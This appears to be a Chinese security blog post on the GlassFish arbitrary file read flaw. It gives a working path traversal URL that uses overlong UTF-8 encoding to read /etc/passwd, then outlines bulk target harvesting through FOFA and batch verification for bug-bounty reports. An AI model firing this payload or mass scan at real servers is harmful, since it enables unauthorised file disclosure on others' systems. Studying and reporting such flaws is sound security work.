typestatusdateslugsummarytagscategoryiconpassword0x00 glassfish漏洞描述漏洞分析:glassfish是一款java编写的跨平台的开源的应用服务器。与宽字节SQL注入一致,都是由于unicode编码歧义导致的。具体payload如下构造:https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd0x01 fofa批量爬取目标IP结果:0x02 批量验证漏洞漏洞验证:下一步批量提交公益src!!!0x02 爬取edu漏洞公告:批量爬取漏洞公告,为后续挖掘src做准备!爬取代码1:爬取代码2:总结完毕,创作不易,有什么问题希望指点出来,希望师傅可以点赞!微信扫码分享作者:告白链接:https://www.gbsec.top/article/Python%E5%BC%80%E5%8F%91-fofa%E6%89%B9%E9%87%8F%E6%8C%96%E6%8E%98glassfish-%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。相关文章文件操作之文件下载读取漏洞-CVE-2019-18371python安全开发-子域名爬取&ftp爆破python开发-sqlmapapi接口批量扫描注入python安全开发-多线程目录扫描&端口扫描&子域名爆破python安全开发-rce命令执行&请求测试&豆 ban的信息爬取构造EXP-Python盲注脚本python安全开发-rce命令执行&请求测试&豆 ban的信息爬取构造EXP-Python盲注脚本